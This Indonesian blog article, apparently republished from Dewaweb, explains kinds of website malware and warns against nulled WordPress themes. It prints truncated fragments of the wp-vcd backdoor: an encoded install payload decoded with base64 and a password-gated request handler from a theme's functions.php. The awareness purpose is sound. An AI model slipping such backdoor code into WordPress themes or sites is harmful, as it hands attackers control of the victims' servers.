Jenis dan Penyebab Malware Pada Website

Jenis dan Penyebab Malware Pada Website

Zaman sekarang memiliki sebuah website sudah suatu keharusan, baik untuk personal blog, bisnis maupun blog untuk berita umum, tapi apakah Anda sudah paham dengan apa yang namanya malware?

Banyak orang yang belum peduli dengan penggunaan website, sehingga menjadi target dari malware itu sendiri.

Apa Itu Malware

Malware adalah singkatan dari Malicious Software, Artinya sendiri adalah sebuah software yang dirancang dengan tujuan untuk membahayakan, menyusup, atau merusak sebuah komputer.

Pada artikel ini akan dibahas mengenai bagaimana sebuah website diserang oleh malware.

Jenis Malware Pada Website

Backdoor

Backdoor adalah salah satu jenis malware yang bersarang pada website, biasanya backdoor ini menggunakan script shell-backdoor. Backdoor ini ditanam oleh hacker yang sudah menyusupi website Anda, dibawah ini adalah salah satu contoh Shell Backdoor.

PopUp Ads Malware

Jika Anda menggunakan CMS WordPress dan sering menggunakan theme atau plugins yang nulled (free) yang didownload dari website yang tidak resmi, maka pasti Anda pernah merasakan ada Ads yang menempel di website. Ads Malware ini adalah termasuk malware injected, jadi dari scriptnya tersendiri sudah terinfeksi malware, ketika dideploy di website maka malware tersebut akan berjalan otomatis.

Ads ini bekerja jika Anda membuka website yang terinfeksi kemudian akan diredirect ke website asing.

Phishing

Ini juga termasuk salah satu bentuk malware, jenis ini termasuk berbahaya karena biasa digunakan untuk scamming. Yaitu bentuk penipuan atau seakan-akan menyamakan dengan yang asli. Halnya seperti halaman login ke Internet Banking, menampilkan form login tetapi sebenarnya bukan dari Bank resmi. Jika Anda tidak waspada, maka data-data yang Anda masukkan dapat masuk ke log Hacker dan dapat menyalahgunakan data-data Anda.

Spamming

Jenis ini menjadi salah satu ancaman terbanyak pada pengguna website di Internet, bagaimana tidak. Salah satu email account yang terdaftar di account hosting Anda dapat digunakan untuk mengirim email masal dan bertubi-tubi ke alamat yang berbeda, biasanya Hacker menyisipkan email scam untuk mendapatkan data yang di-inginkan dari target mereka.

Ransomware

Beberapa tahun lalu sempat viral berita tentang ada Ransomware yang menyerang hampir 200ribu komputer di 150 negara di Dunia. Yaitu Wannacry, yang mengakibatkan kerugian jutaan dollar, jenis ini melakukan deny access atau menolak akses ke komputer yang terkena Ransomware. Biasanya, korban diminta memberikan sejumlah uang dalam bentuk dollar, bitcoin untuk menebus data-data komputer mereka yang di-lock.

Botnet Attack

Jenis ini sangat berbeda dari beberapa jenis diatas, karena cara kerjanya ini melakukan attack seperti DDoS, menyebarkan malware ke website lain, bahkan spam dan scam. Botnet attack bekerja dengan sebuah script yang tertanam di server, dengan menggunakan cronjob maka botnet tersebut bisa berjalan otomatis sesuai waktu yang di-set pada Cronjob.

Penyebab Website Diserang Malware

Ada banyak penyebab website dapat diserang malware, salah satunya jika menggunakan CMS WordPress yaitu pada saat Anda melakukan download theme dari website yang tidak resmi, seperti pada website Downloadfreethemes. Di website tersebut menyajikan banyak theme premium namun sudah di-inject script malware terlebih dahulu.

wp-vcd.php di WordPress

Banyak sekali yang mengeluhkan script ini, seperti yang diketahui, script wp-vcd.php bukan script original ataupun core dari wordpress, ini adalah script malware. Dibawah ini adalah contoh isinya.

$install_code = 'c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd[.....]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT); $install_code =
str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

Ada script yang diencode, karena untuk script malware selalu diencode atau dienkripsi.

functions.php di Directory Themes.

Selain wp-vcd.php, ada jug functions.php pada directory themes yang digunakan, dapat dilihat bahwa pada script dibawah ini connect ke wp-vcd.php.

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f98cd901d7551a69caf41ba758a7c972'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
[......]
$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

Kesimpulan:

Mulai sekarang, harus hati-hati dalam beraktivitas pada website yang kita miliki, peduli dengan adanya ancaman serangan hacker maupun serangan malware.

Yang paling penting adalah hindari download theme dari website yang tidak resmi seperti diatas, akan menciptakan malware yang dapat mengganggu fungsional website maupun aktivitas pengiriman email, karena bisa jadi menciptakan email spamming.

 

 

 

 

 

Sumber Asli : Dewaweb.com

×

Halo!

Klik link akun whatsapp dibawah ini untuk menghubungi kami atau kirim permintaan Anda ke email winetseven@gmail.com

× Ada yang bisa kami bantu ?